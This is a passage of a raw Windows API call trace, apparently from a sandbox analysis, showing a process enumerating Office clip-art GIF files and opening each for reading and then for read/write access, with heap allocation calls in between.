AreFileApisANSI () returned 1 [0100.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0100.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 69 [0100.937] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00172_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1126)) returned 1 [0100.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0100.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0100.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.938] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf7e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00174_.GIF", cAlternateFileName="")) returned 1 [0100.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0100.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0100.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0100.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0100.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.939] AreFileApisANSI () returned 1 [0100.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0100.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.939] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0100.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.939] AreFileApisANSI () returned 1 [0100.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0100.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 69 [0100.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.940] GetFileType (hFile=0x27c) returned 0x1 [0100.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0100.940] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.940] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.941] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.941] CloseHandle (hObject=0x27c) returned 1 [0100.941] AreFileApisANSI () returned 1 [0100.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0100.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 69 [0100.941] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.941] GetFileType (hFile=0x27c) returned 0x1 [0100.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0100.941] CloseHandle (hObject=0x27c) returned 1 [0100.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.941] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.942] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.943] AreFileApisANSI () returned 1 [0100.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8af48 [0100.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x8af48, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 69 [0100.943] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00174_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf7e)) returned 1 [0100.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0100.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0100.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0100.943] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.943] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.943] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd32, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00175_.GIF", cAlternateFileName="")) returned 1 [0100.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0100.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0100.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0100.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x604a8 [0100.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0100.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0100.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x604a8 | out: hHeap=0x20000) returned 1 [0100.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0100.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.944] AreFileApisANSI () returned 1 [0100.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0100.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.944] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.944] AreFileApisANSI () returned 1 [0100.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.944] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0100.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 69 [0100.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.945] GetFileType (hFile=0x27c) returned 0x1 [0100.945] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0100.945] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.945] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.945] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.946] CloseHandle (hObject=0x27c) returned 1 [0100.946] AreFileApisANSI () returned 1 [0100.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0100.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF") returned 69 [0100.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.946] GetFileType (hFile=0x27c) returned 0x1 [0100.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0100.946] CloseHandle (hObject=0x27c) returned 1 [0100.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.946] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.946] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0100.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0100.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0100.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0100.947] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0100.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.947] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) 